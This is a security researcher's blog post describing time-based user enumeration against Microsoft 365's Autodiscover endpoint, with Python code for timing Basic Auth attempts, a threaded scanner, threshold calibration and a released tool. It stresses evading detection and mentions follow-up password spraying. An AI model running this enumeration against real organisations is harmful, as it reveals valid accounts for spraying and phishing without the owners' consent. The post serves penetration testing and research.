October 03, 2024

Kicking it Old-School with Time-Based Enumeration in Azure

Written by @nyxgeek

Table of contents

Introduction
Time-Based User Enumeration – Azure Edition
Basic Auth, WHAT?
Time for Maths for Times
Autodiscover Enumerator
Caveats and Notes
Conclusion

Introduction

Yet another user-enumeration method has been identified in Azure. While Microsoft may have disabled Basic Authentication some time ago, we can still abuse it to identify valid users with a classic technique—time-based user enumeration.

Time-based enumeration is a means of identifying valid users based on the difference in time it takes for the server to return a response to a login attempt. To test for it, you try to log in with a valid username (and an incorrect password) and measure the time it takes to return an ‘Invalid Password’ response. Then you try to log in with an invalid username and measure the response time. If the ‘Invalid Password’ response for an invalid user is a lot faster or slower than the response of a valid user, then you have found time-based user enumeration.

The particular method I’m about to demonstrate has a few advantages:

It is silent and cannot be detected.
It works multi-threaded.
It detects both UPNs and aliases.

So strap in, and let’s take a look at time-based user enumeration in Azure, and its origins dating back to 2014.

Time-Based User Enumeration – Azure Edition

Time-based user enumeration flaws have existed in various Microsoft products since at least 2014. The technique was first discovered in Microsoft Exchange by a member of foofus and published in August 2014.

An attacker makes a login attempt and measures the response time. If it’s a quick response, they’ve just found a valid username. If the response takes longer (approximately 5-10x as long), then it is an invalid username. This enumeration was really useful and could be run multi-threaded.

This Exchange enumeration technique has been the starting point for many external pen tests over the years (and internal pen tests too!).

Time-based user enumeration is particularly near and dear to me, and not just because it’s a cyber force-multiplier. The first vulnerability* I ever found was a time-based user enumeration flaw in the on-premises version of Microsoft Lync, aka Skype for Business, back in 2016. (The asterisk is because Microsoft has repeatedly made clear that they do not consider user enumeration to be a vulnerability.)

The Lync time-based user enumeration was simply a variation on the same method described by foofus.net against Exchange. However, with Lync, it was limited to single-threaded use and targeted a Lync POST endpoint instead of the Exchange Autodiscover or OWA servers. Concurrent logins would throw off the timing. Still, single-threaded user enumeration was better than no user enumeration.

It used to be a real bummer when you couldn’t find a source of user enumeration against a target org. Luckily, those days of slim pickings are a thing of the past! In our modern age, Microsoft grants attackers a PLETHORA of ways to enumerate users. And, while there's no shortage of user enumeration methods in Azure/M365, I'm going to demonstrate yet another one -- Time-Based User Enumeration via Basic Auth against Microsoft Autodiscover servers.

Basic Auth, WHAT?

"What?" you say? "Basic Auth is dead!", you say? Well yes, it more or less is dead, but not entirely gone. It lingers on.

Let's take a look at Microsoft's M365 Autodiscover servers. In M365, the Autodiscover endpoint for Commercial Azure (the default that MOST of you are going to be in) is located at:

https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc

If you send a request to it with curl, you can see that the HTTP response headers advertise Basic Auth.

You used to be able to perform Basic Authentication against this endpoint utilizing a user’s UPN. If you try it now, you'll get a 400 response, and you can see in the HTTP headers that it has blocked Basic Auth.

However, if we time the execution of these requests, we can quickly see that there is a difference in the response times for valid users vs invalid users.

Figure 9 - Valid vs Invalid Response Times

Here you can see that a valid username had a response time of 0.3 seconds while an invalid username had a response time of 2.6 seconds. That is quite a difference.
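
To make the measurement concrete, here is a minimal Python sketch of timing a single Basic Auth attempt against the endpoint above. It is not the code behind the figure: the helper names (`basic_auth_header`, `timed`, `probe`), the placeholder password, the 3-second timeout, and the choice of a plain GET request are all assumptions made for illustration.

```python
import base64
import time
import urllib.error
import urllib.request

AUTODISCOVER_URL = "https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc"


def basic_auth_header(username: str, password: str) -> str:
    """Build the value of an HTTP Basic Authorization header."""
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def timed(call):
    """Run call() and return (result, elapsed_seconds) using a monotonic clock."""
    start = time.perf_counter()
    result = call()
    return result, time.perf_counter() - start


def probe(username: str, password: str = "not-the-password", timeout: float = 3.0):
    """Send one request and return (status_code_or_None, elapsed_seconds).

    Assumption: a plain GET carrying an Authorization header is enough to
    show the timing gap. The request shape used by the real tool may differ.
    """
    request = urllib.request.Request(
        AUTODISCOVER_URL,
        headers={"Authorization": basic_auth_header(username, password)},
    )

    def send():
        try:
            with urllib.request.urlopen(request, timeout=timeout) as response:
                return response.status
        except urllib.error.HTTPError as err:
            return err.code  # a 4xx response still carries a usable timing
        except OSError:
            return None  # timeout or connection failure

    return timed(send)
```

Calling `probe()` once with a known-valid address and once with a known-invalid one, in a tenant you are authorized to test, is a quick way to check whether the gap reproduces from your vantage point.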

But does this hold up if we add threading? And how can we reliably determine what the timing threshold is?

I put together a simple scanner in Python to time requests and perform user enumeration. I hardcoded some ballpark figures for testing and set 1.0 seconds as the threshold that divided valid from invalid usernames. This worked most of the time but proved to be a bit high. And I noticed that if I increased the threads, the overall response times increased.
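
The shape of such a scanner can be sketched in a few lines. This is an illustration only, not the actual scanner: `classify`, `enumerate_users`, and the `measure` callable (anything that takes a username and returns the elapsed seconds for one attempt) are hypothetical names, and the 1.0-second default simply mirrors the ballpark threshold mentioned above.

```python
from concurrent.futures import ThreadPoolExecutor


def classify(elapsed: float, threshold: float = 1.0) -> str:
    """Fast responses are treated as valid users, slow ones as invalid."""
    return "valid" if elapsed < threshold else "invalid"


def enumerate_users(usernames, measure, threads: int = 5, threshold: float = 1.0):
    """Time every username with `measure` on a thread pool.

    Returns {username: (elapsed_seconds, "valid" | "invalid")}.
    """
    usernames = list(usernames)
    with ThreadPoolExecutor(max_workers=threads) as pool:
        # pool.map preserves input order, so results line up with usernames
        timings = list(pool.map(measure, usernames))
    return {
        name: (elapsed, classify(elapsed, threshold))
        for name, elapsed in zip(usernames, timings)
    }
```

Keeping the timing function injectable makes it easy to swap in recorded timings when experimenting with thresholds, without sending any traffic.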

I needed to do more research.

Time for Maths for Times

In order to determine what timing threshold limits should be used, I ran tests with a range of threads from 1 to 100, saving the output from each test into its own file. I then wrote a parser, reclassify.py, that would take the response times from the file and identify the natural gaps in timing between the valid and invalid users.

The method for data clustering I employed is called Jenks natural breaks optimization and is a technique developed for clustering data for mapmaking. Besides identifying the breakpoints between clusters of data, the parser also reclassifies the valid vs invalid lines based on these newly calculated breakpoints and outputs an updated file.
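
For the two-cluster case (valid vs invalid), the idea behind natural breaks can be shown with a brute-force search: sort the timings, try every split point, and keep the split that minimizes the total squared deviation from each cluster's mean. The sketch below is an assumption-laden illustration, not the contents of reclassify.py. The function names are made up, and reporting the break as the midpoint of the gap is a choice made here for readability.

```python
def sum_squared_dev(values):
    """Sum of squared deviations from the mean (0.0 for an empty list)."""
    if not values:
        return 0.0
    mean = sum(values) / len(values)
    return sum((v - mean) ** 2 for v in values)


def two_class_break(times):
    """Return a break value separating the fast cluster from the slow one."""
    ordered = sorted(times)
    if len(ordered) < 2:
        raise ValueError("need at least two timings to find a break")

    best_split, best_cost = 1, float("inf")
    for i in range(1, len(ordered)):
        # cost of putting the first i timings in one class, the rest in the other
        cost = sum_squared_dev(ordered[:i]) + sum_squared_dev(ordered[i:])
        if cost < best_cost:
            best_split, best_cost = i, cost

    # report the middle of the gap between the two clusters
    return (ordered[best_split - 1] + ordered[best_split]) / 2
```

The exhaustive search is quadratic in the number of timings, which is fine for a few thousand samples. A dedicated Jenks implementation would be the better choice for more classes or larger data sets.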

I added a --max-value flag to allow you to zoom in on the data. In the graph of the full results, we can see that the bulk of our data falls around 2.0 seconds. (Ignore the 3.0 spike: those are assigned values for any requests that exceed the timeout, and we set a short max timeout value to keep things speedy.)

Zoomed in, we can more readily see the gap between the valid (left) and invalid (right) responses. In fact, if you were to zoom in even more, you would find it possible to differentiate between aliases and UPNs. Aliases will generally be slower than UPNs but not as slow as invalid attempts. They'll often blend in with the slower UPNs. However, this is not very reliable, as the timing variances are smaller and any network congestion will sway your results.
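
The zooming step can be approximated without any plotting library. The sketch below bins response times and optionally drops everything above a cutoff, which also removes the spike of timed-out requests recorded at the timeout value. The function name, the `max_value` parameter, and the bin width are assumptions for illustration and are not taken from the tool's source.

```python
import math
from collections import Counter


def histogram(times, max_value=None, bin_width=0.1):
    """Count response times per bin; keys are the lower edge of each bin.

    Times above max_value (if given) are dropped before binning.
    """
    kept = [t for t in times if max_value is None or t <= max_value]
    # round before flooring so values like 0.3 / 0.1 land in the expected bin
    counts = Counter(math.floor(round(t / bin_width, 9)) for t in kept)
    return {round(b * bin_width, 10): counts[b] for b in sorted(counts)}
```

With a small bin width and a cutoff just below the timeout value, the empty bins between the fast and slow groups show where a threshold could reasonably sit.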

Based on these findings, I set some general default thresholds according to the number of threads. I purposely left them a little on the high side, as it's always better to have a few false positives than to miss valid users.

After performing the tests, I then used the reclassify.py tool to identify breakpoints and to see if any improvements could be made by redrawing the valid/invalid thresholds based on this data. For the test, I used a user list of 1,029 usernames, 31 of which were valid UPNs.

Threads	Initial Break Value (s)	Found Valids	False Positives	Reclassify Break Value (s)	Reclassify Found Valids	Reclassify False Positives
1	0.75	31/31 (100%)	0	0.79	31/31 (100%)	1
5	0.75	30/31 (97%)	1	0.70	30/31 (97%)	0
15	0.75	30/31 (97%)	2	0.66	29/31 (94%)	1
25	0.75	30/31 (97%)	0	0.80	30/31 (97%)	1
50	0.70	31/31 (100%)	0	0.73	31/31 (100%)	1
100	0.65	28/31 (90%)	0	0.79	28/31 (90%)	1

As you can see, the reclassify.py script, while useful for illustrative purposes, does not fare particularly well at drawing new thresholds mathemagically. Time-based enumeration can be a little trickier than other methods due to the unpredictable nature of network traffic. There is always going to be a little bit of slop built into it.

Autodiscover Enumerator

I've wrapped up this enumeration method into a tool called Autodiscover Enumerator. The tool can be found here: https://github.com/nyxgeek/autodiscover_enum/

This is a simple scanner—no database, just text output. By default, the tool will display the response code and times. The -o option can be used to write just the valid usernames to a file.

You want to include a screenshot in a report? I got u. Use -N to suppress that awesome banner and -q to display only the valid usernames.

Figure 14 - Banner Disabled, Quiet Mode Enabled

Caveats and Notes

This method CANNOT be used to identify valid credentials. If you provide a password and look at the response headers, you will see a verbose error indicating that Basic Auth is disabled.

Figure 15 - unable to identify valid creds

This method isn't foolproof. Network congestion can really throw things off. This method seems to be fine up to at least 100 threads. Your mileage may vary.
This enumeration method identifies both UPNs and EMAIL ALIASES (proxyaddress/smtp). I personally would prefer just the UPNs, but we got what we got. If you want to find only the UPNs, you can start with this method, then perform an actual spray against Graph and that will reveal any aliases as invalid usernames.

Figure 16 - Example of Email Alias in M365 Admin Portal

If you send a blank password, the response time increases greatly for both valid and invalid usernames, but the timing difference is still discernible.

Figure 17 - Difference Between Invalid Password and Null Password Attempts

If you examine the verbose error code returned for a blank password being attempted, you see that it identifies it as an EmptyPwd.

It is curious that this seems to indicate that the endpoint is evaluating whether the password is blank before it denies due to Basic Auth. You would think a Basic Auth denial should come first, regardless of whether a password is blank.

If your connection is slow, or you’re not getting hits, examine the average response times you're seeing. Test with some known good UPNs shuffled in with a bunch of invalid UPNs, and run the output through reclassify.py to find a good breakpoint. Then try setting the default timeout using the -m option, based on the response times you’re seeing.

Figure 19 - Troubleshooting Timing Issues
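
When the calibration run uses addresses whose status is already known, a threshold can also be checked by hand. The following sketch is a simpler alternative to a clustering pass, not what reclassify.py does: it takes the timings of known-valid and known-invalid attempts and returns the middle of the gap between them, or `None` when the two groups overlap. The function name and return convention are assumptions for illustration.

```python
def calibrate(valid_times, invalid_times):
    """Return a threshold between known-valid and known-invalid timings.

    Returns None when the slowest valid response is not faster than the
    fastest invalid one, meaning no clean cutoff exists for this sample.
    """
    slowest_valid = max(valid_times)
    fastest_invalid = min(invalid_times)
    if slowest_valid >= fastest_invalid:
        return None
    return (slowest_valid + fastest_invalid) / 2
```

A `None` result is a hint that the connection is too noisy at the current thread count and that a slower, less parallel run may separate the groups better.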

This timing enumeration touches a couple of service areas within Azure. First, it targets an endpoint in Microsoft's Software as a Service (SaaS) offering of the M365 products (specifically, the Outlook Autodiscover endpoint). Second, M365 ties in with Entra ID (previously Azure AD), which handles IAM for Azure.

Conclusion

This method of enumeration is silent and versatile. It is able to identify guest accounts, email aliases, and UPNs. The unfortunate downside of it detecting both aliases and UPNs is that it makes this method useless for identifying true user counts and performing statistical surveys. Still, it can be a useful tool for identifying users while remaining undetected.

Happy hunting!
